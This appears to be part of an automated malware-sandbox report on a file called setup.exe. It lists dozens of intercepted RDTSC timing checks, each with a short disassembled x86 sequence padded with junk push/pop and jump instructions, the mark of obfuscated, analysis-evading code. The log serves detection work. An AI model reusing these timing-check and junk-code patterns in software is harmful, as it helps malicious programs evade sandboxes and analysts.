Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C1B7A second address: 3C1B89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C1B89 second address: 3C1BB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FDDE8CE13D6h 0x0000000a popad 0x0000000b jmp 00007FDDE8CE13E8h 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007FDDE8CE13D6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3903EA second address: 1DCBEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE9067F6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d mov dword ptr [ebp+12460CADh], edi 0x00000013 mov ecx, dword ptr [ebp+122D3792h] 0x00000019 push dword ptr [ebp+122D15E5h] 0x0000001f pushad 0x00000020 jns 00007FDDE9067F69h 0x00000026 mov edi, 6CD44FDFh 0x0000002b popad 0x0000002c call dword ptr [ebp+122D2AEBh] 0x00000032 pushad 0x00000033 jmp 00007FDDE9067F75h 0x00000038 xor eax, eax 0x0000003a cld 0x0000003b mov edx, dword ptr [esp+28h] 0x0000003f pushad 0x00000040 pushad 0x00000041 push ecx 0x00000042 pop esi 0x00000043 push ecx 0x00000044 pop eax 0x00000045 popad 0x00000046 jmp 00007FDDE9067F76h 0x0000004b popad 0x0000004c mov dword ptr [ebp+122D3A7Eh], eax 0x00000052 jmp 00007FDDE9067F79h 0x00000057 mov esi, 0000003Ch 0x0000005c pushad 0x0000005d jmp 00007FDDE9067F72h 0x00000062 mov dword ptr [ebp+122D275Bh], edi 0x00000068 popad 0x00000069 add esi, dword ptr [esp+24h] 0x0000006d mov dword ptr [ebp+122D1996h], eax 0x00000073 lodsw 0x00000075 mov dword ptr [ebp+122D275Bh], edx 0x0000007b add eax, dword ptr [esp+24h] 0x0000007f jmp 00007FDDE9067F75h 0x00000084 mov ebx, dword ptr [esp+24h] 0x00000088 xor dword ptr [ebp+122D275Bh], ecx 0x0000008e push eax 0x0000008f push ebx 0x00000090 push edx 0x00000091 push eax 0x00000092 push edx 0x00000093 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 390636 second address: 39063A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 39063A second address: 390647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 390647 second address: 39064C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 39064C second address: 390694 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDDE9067F76h 0x00000008 jmp 00007FDDE9067F70h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 push esi 0x00000014 jmp 00007FDDE9067F78h 0x00000019 pop esi 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FDDE9067F6Ah 0x00000025 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 390694 second address: 39069A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3907F8 second address: 39080E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp], esi 0x00000009 mov di, dx 0x0000000c nop 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007FDDE9067F66h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 390A84 second address: 390A9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE8CE13E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 390F06 second address: 390F10 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDDE9067F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 390F10 second address: 390F17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C5804 second address: 3C5835 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE9067F73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007FDDE9067F74h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C5835 second address: 3C5841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FDDE8CE13D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C598E second address: 3C5992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C5B1F second address: 3C5B28 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C5C9B second address: 3C5CB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE9067F77h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C5E28 second address: 3C5E3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE8CE13E0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3C5E3C second address: 3C5E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CFC78 second address: 3CFC7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CFC7C second address: 3CFC88 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CFC88 second address: 3CFC8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CFC8C second address: 3CFC92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CE693 second address: 3CE697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CE697 second address: 3CE69F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CE69F second address: 3CE6B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE8CE13E3h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CE6B8 second address: 3CE6D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDDE9067F71h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CE82F second address: 3CE849 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDDE8CE13DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007FDDE8CE1404h 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CE99E second address: 3CE9A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FDDE9067F66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CE9A8 second address: 3CE9EB instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDDE8CE13D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jno 00007FDDE8CE13D6h 0x00000011 push edi 0x00000012 pop edi 0x00000013 jmp 00007FDDE8CE13E2h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d pushad 0x0000001e push edi 0x0000001f jmp 00007FDDE8CE13E5h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CF0C4 second address: 3CF0CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CF0CA second address: 3CF0E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE8CE13DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007FDDE8CE13DCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CF392 second address: 3CF3A6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007FDDE9067F66h 0x00000009 jc 00007FDDE9067F66h 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CF3A6 second address: 3CF3AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CF3AA second address: 3CF3D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE9067F78h 0x00000007 jmp 00007FDDE9067F6Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CF3D7 second address: 3CF3DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CF3DB second address: 3CF3DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CFAF8 second address: 3CFAFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CFAFE second address: 3CFB04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CE3D4 second address: 3CE3DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CE3DA second address: 3CE3E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3CE3E0 second address: 3CE3E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3D2414 second address: 3D242F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE9067F75h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3D1FD4 second address: 3D1FF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE8CE13E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b jnc 00007FDDE8CE13D8h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3D1FF6 second address: 3D1FFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3D54F4 second address: 3D5522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDE8CE13E8h 0x00000009 jmp 00007FDDE8CE13E1h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3D5522 second address: 3D553E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDDE9067F76h 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3D4F03 second address: 3D4F14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 jg 00007FDDE8CE13DEh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3D4F14 second address: 3D4F33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FDDE9067F6Ch 0x0000000c jmp 00007FDDE9067F6Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3D4F33 second address: 3D4F39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3D5210 second address: 3D5232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jne 00007FDDE9067F70h 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 ja 00007FDDE9067F66h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3D93A2 second address: 3D93EA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDDE8CE13E2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007FDDE8CE13E6h 0x00000014 popad 0x00000015 jmp 00007FDDE8CE13E6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3DD999 second address: 3DD99D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3DD99D second address: 3DD9A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3DD9A3 second address: 3DD9A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3DD9A8 second address: 3DD9C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FDDE8CE13D6h 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jp 00007FDDE8CE13D6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3DD9C1 second address: 3DD9F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnl 00007FDDE9067F80h 0x0000000f pushad 0x00000010 jng 00007FDDE9067F66h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3DD9F5 second address: 3DD9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3DD9FB second address: 3DDA04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3DDB64 second address: 3DDB71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3DDECD second address: 3DDED1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3DDED1 second address: 3DDEE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007FDDE8CE13D6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 390CA6 second address: 390D20 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDDE9067F7Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jnc 00007FDDE9067F68h 0x00000013 mov ebx, dword ptr [ebp+12486D48h] 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007FDDE9067F68h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 0000001Ah 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 mov ecx, 689D3A51h 0x00000038 add eax, ebx 0x0000003a add dword ptr [ebp+12460DABh], edx 0x00000040 mov edi, dword ptr [ebp+1244A6E8h] 0x00000046 nop 0x00000047 push ecx 0x00000048 jc 00007FDDE9067F68h 0x0000004e push edx 0x0000004f pop edx 0x00000050 pop ecx 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push esi 0x00000055 push edx 0x00000056 pop edx 0x00000057 pop esi 0x00000058 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 390D20 second address: 390D26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 390D26 second address: 390D85 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDDE9067F66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FDDE9067F68h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 mov ecx, dword ptr [ebp+122D2978h] 0x0000002d push 00000004h 0x0000002f stc 0x00000030 jmp 00007FDDE9067F6Ch 0x00000035 nop 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 push edi 0x0000003a pop edi 0x0000003b jmp 00007FDDE9067F74h 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 390D85 second address: 390DAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE8CE13E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FDDE8CE13D6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 390DAA second address: 390DB8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FDDE9067F66h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3DE1EF second address: 3DE204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FDDE8CE13DCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3DE204 second address: 3DE21C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FDDE9067F70h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3DE381 second address: 3DE3A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDDE8CE13DCh 0x0000000b jmp 00007FDDE8CE13DFh 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3DED3E second address: 3DED44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3DED44 second address: 3DED55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007FDDE8CE13D6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3DED55 second address: 3DED79 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDDE9067F66h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007FDDE9067F74h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3DED79 second address: 3DED7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3DED7F second address: 3DED84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3DED84 second address: 3DEDA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDDE8CE13E6h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3E9FE4 second address: 3E9FE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3EA415 second address: 3EA41D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3EA41D second address: 3EA424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3EA424 second address: 3EA43B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnc 00007FDDE8CE13D6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f js 00007FDDE8CE13DEh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3EA43B second address: 3EA449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FDDE9067F66h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3EB233 second address: 3EB239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3EB51B second address: 3EB53A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDDE9067F77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3EB84A second address: 3EB84E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3EB84E second address: 3EB857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3EF02B second address: 3EF030 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
